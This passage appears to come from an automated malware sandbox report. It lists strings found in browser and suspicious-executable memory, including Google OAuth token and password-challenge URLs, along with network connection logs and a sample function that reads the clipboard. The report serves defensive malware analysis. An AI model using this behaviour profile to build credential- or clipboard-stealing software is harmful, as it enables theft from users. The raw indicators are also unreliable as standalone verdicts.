Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/policies/privacy/onPrefEMEGlobalEnabledChanged()
Source: d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8325000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3437424456.00000269D83DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000003.3326947439.00000269DC86F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000003.3326323227.00000269DC838000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000003.3325516382.00000269DC600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3448689533.00000269D9320000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000027.00000003.3326626929.00000269DC853000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8325000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?client=firefox-b-d&q=
Source: chrome.exe, 00000010.00000003.3113175567.000044C000474000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/search?q=$
Source: chrome.exe, 00000010.00000003.3128318055.000044C000E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
Source: chrome.exe, 00000014.00000003.3137188158.000010A000270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136678140.000010A00026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3137331455.000010A000274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v1/userinfo
Source: chrome.exe, 00000014.00000003.3137188158.000010A000270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136678140.000010A00026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3137331455.000010A000274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v2/tokeninfo
Source: chrome.exe, 00000014.00000003.3137188158.000010A000270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136678140.000010A00026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3137331455.000010A000274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/oauth2/v4/token
Source: chrome.exe, 00000014.00000003.3137188158.000010A000270000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3136678140.000010A00026C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000014.00000003.3137331455.000010A000274000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googleapis.com/reauth/v1beta/users/
Source: chrome.exe, 00000010.00000003.3128318055.000044C000E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: chrome.exe, 00000010.00000003.3128318055.000044C000E74000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: chrome.exe, 00000010.00000003.3153276965.000044C001748000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000010.00000003.3153781356.000044C0016FC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3153183718.000044C001070000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3154136056.000044C00180C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3153890473.000044C001718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3153276965.000044C001748000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
Source: chrome.exe, 00000010.00000003.3153890473.000044C001718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152627843.000044C0017B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152426467.000044C0017AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3153064493.000044C001768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.kK1dM3um3so.2019.O/rt=j/m=q_dnp
Source: chrome.exe, 00000010.00000003.3153890473.000044C001718000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152627843.000044C0017B4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3152426467.000044C0017AC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000010.00000003.3153064493.000044C001768000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: firefox.exe, 00000027.00000002.3403004635.0000007215BBC000.00000004.00000010.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3426751089.00000269D7AA7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3467663342.00000269DBC6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3417660527.00000269CC291000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3433468138.00000269D8213000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org
Source: firefox.exe, 00000027.00000002.3430306724.00000269D7DC0000.00000002.08000000.00040000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/%LOCALE%/firefox/set-as-default/thanks/
Source: ccdb824191.exe, 00000017.00000003.3462293074.000000000574A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.CDjelnmQJyZc
Source: ccdb824191.exe, 00000017.00000003.3462293074.000000000574A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.b3lOZaxJcpF6
Source: ccdb824191.exe, 0000000F.00000003.3159744614.0000000005C0E000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3307391030.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3462293074.000000000574A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/en-US/privacy/firefox/Firefox
Source: ccdb824191.exe, 00000017.00000003.3462293074.000000000574A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
Source: ccdb824191.exe, 0000000F.00000003.3159744614.0000000005C0E000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3307391030.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3462293074.000000000574A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/media/img/mozorg/mozilla-256.4720741d4108.jpg
Source: ccdb824191.exe, 0000000F.00000003.3159744614.0000000005C0E000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000013.00000003.3307391030.0000000005D5F000.00000004.00000800.00020000.00000000.sdmp, ccdb824191.exe, 00000017.00000003.3462293074.000000000574A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.org/privacy/firefox/gro.allizom.www.
Source: firefox.exe, 00000027.00000002.3403004635.0000007215BBC000.00000004.00000010.00020000.00000000.sdmp	String found in binary or memory: https://www.mozilla.orgo
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8325000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.msn.com
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3426751089.00000269D7AA7000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.openh264.org/
Source: d1834e5726.exe, 0000000B.00000003.2697887426.0000000000AC1000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2697775389.0000000000AC7000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000AC4000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000003.2698158115.0000000000ACF000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
Source: firefox.exe, 00000027.00000002.3437424456.00000269D8303000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.widevine.com/
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com
Source: d1834e5726.exe, 0000000B.00000003.2698103352.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, d1834e5726.exe, 0000000B.00000002.2699067133.0000000000AAC000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3465100253.00000269DBB2D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3467663342.00000269DBC6D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3437424456.00000269D83DF000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000003.3371532481.00000269E47A9000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/:
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/?feature=ytca
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/J
Source: chrome.exe, 00000010.00000003.3097294012.000044C000660000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
Source: firefox.exe, 00000026.00000002.3323501592.0000021CE2FD0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3423342277.00000269D79AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3414922783.00000269CC020000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3456131295.00000269D9F5F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3417660527.00000269CC25D000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3416870069.00000269CC0A0000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3416870069.00000269CC0A9000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3456131295.00000269D9FB8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3417660527.00000269CC203000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000003.3378074361.00000269DF0E1000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3417660527.00000269CC211000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3461653529.00000269DB8D5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3461653529.00000269DB8A9000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3456131295.00000269D9F9A000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd
Source: firefox.exe, 00000025.00000002.3306324767.0000025FFF26A000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000026.00000002.3323501592.0000021CE2FDF000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000027.00000002.3416870069.00000269CC0A9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd--no-default-browser

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49986
Source: unknown	Network traffic detected: HTTP traffic on port 50145 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50122 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49970 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49949 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49980
Source: unknown	Network traffic detected: HTTP traffic on port 50007 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50175
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50053
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50055
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50176
Source: unknown	Network traffic detected: HTTP traffic on port 49898 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50179
Source: unknown	Network traffic detected: HTTP traffic on port 49875 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50178
Source: unknown	Network traffic detected: HTTP traffic on port 50202 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50180
Source: unknown	Network traffic detected: HTTP traffic on port 50071 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50063
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50184
Source: unknown	Network traffic detected: HTTP traffic on port 50180 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50234 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50125 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49979
Source: unknown	Network traffic detected: HTTP traffic on port 49889 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50105
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50229
Source: unknown	Network traffic detected: HTTP traffic on port 49996 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50228
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49970
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50109
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50186
Source: unknown	Network traffic detected: HTTP traffic on port 49967 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50185
Source: unknown	Network traffic detected: HTTP traffic on port 50091 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50186 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50188
Source: unknown	Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50066
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50069
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50101
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50189
Source: unknown	Network traffic detected: HTTP traffic on port 50074 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50070
Source: unknown	Network traffic detected: HTTP traffic on port 50004 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50053 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50193
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50071
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50074
Source: unknown	Network traffic detected: HTTP traffic on port 50128 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49967
Source: unknown	Network traffic detected: HTTP traffic on port 49901 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49924 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50120 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50015 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50189 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50232
Source: unknown	Network traffic detected: HTTP traffic on port 50130 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50234
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50233
Source: unknown	Network traffic detected: HTTP traffic on port 50133 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50099 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49986 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50082
Source: unknown	Network traffic detected: HTTP traffic on port 50156 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50175 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50232 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49832
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49953
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50007
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50128
Source: unknown	Network traffic detected: HTTP traffic on port 50012 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49994 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50167 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49944 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50120
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50122
Source: unknown	Network traffic detected: HTTP traffic on port 50150 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50121
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50124
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50123
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50126
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50004
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50125
Source: unknown	Network traffic detected: HTTP traffic on port 49913 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50092
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50091
Source: unknown	Network traffic detected: HTTP traffic on port 50178 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50153 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49811 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49949
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49948
Source: unknown	Network traffic detected: HTTP traffic on port 50082 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50105 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49945
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49944
Source: unknown	Network traffic detected: HTTP traffic on port 50193 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49940
Source: unknown	Network traffic detected: HTTP traffic on port 50229 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49945 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50149 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50032 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50164 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50098
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50130
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50012
Source: unknown	Network traffic detected: HTTP traffic on port 49916 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50133
Source: unknown	Network traffic detected: HTTP traffic on port 50055 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50099
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50137
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50015
Source: unknown	Network traffic detected: HTTP traffic on port 50158 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50161 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50184 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49980 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49811
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49898
Source: unknown	Network traffic detected: HTTP traffic on port 50169 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50149
Source: unknown	Network traffic detected: HTTP traffic on port 50123 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50070 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50145
Source: unknown	Network traffic detected: HTTP traffic on port 50098 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50150
Source: unknown	Network traffic detected: HTTP traffic on port 50155 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49928
Source: unknown	Network traffic detected: HTTP traffic on port 50176 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49924
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49923
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49889
Source: unknown	Network traffic detected: HTTP traffic on port 50233 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49995 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50063 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49883
Source: unknown	Network traffic detected: HTTP traffic on port 50124 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50166 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49928 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50032
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50153
Source: unknown	Network traffic detected: HTTP traffic on port 50092 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50155
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50156
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50158
Source: unknown	Network traffic detected: HTTP traffic on port 50179 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49908 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49940 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50160
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50041
Source: unknown	Network traffic detected: HTTP traffic on port 50137 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50161
Source: unknown	Network traffic detected: HTTP traffic on port 50163 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49883 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49916
Source: unknown	Network traffic detected: HTTP traffic on port 50066 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49979 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49913
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49998
Source: unknown	Network traffic detected: HTTP traffic on port 49948 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50121 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50228 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49996
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49875
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49995
Source: unknown	Network traffic detected: HTTP traffic on port 49998 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49923 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49994
Source: unknown	Network traffic detected: HTTP traffic on port 50041 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50164
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50163
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50166
Source: unknown	Network traffic detected: HTTP traffic on port 50188 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50167
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50169
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 50202
Source: unknown	Network traffic detected: HTTP traffic on port 50109 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49832 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50185 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50160 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49908
Source: unknown	Network traffic detected: HTTP traffic on port 50126 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49901
Source: unknown	Network traffic detected: HTTP traffic on port 50069 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 50101 -> 443

Source: unknown	HTTPS traffic detected: 23.37.186.133:443 -> 192.168.2.5:49811 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.5:49875 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 116.203.12.114:443 -> 192.168.2.5:49883 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49901 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49913 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49924 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49949 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49953 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49970 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49979 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49994 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49996 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:49998 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50007 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50012 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50015 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50032 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50041 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50063 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50066 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50069 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50074 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50091 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50092 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50098 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50099 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50101 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50105 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.50.161:443 -> 192.168.2.5:50109 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50126 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50128 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50130 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50185 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50184 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 34.160.144.191:443 -> 192.168.2.5:50186 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50229 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50234 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50233 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 35.244.181.201:443 -> 192.168.2.5:50232 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\1016040001\d1834e5726.exe

Code function: 11_2_00431A30 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,

11_2_00431A30

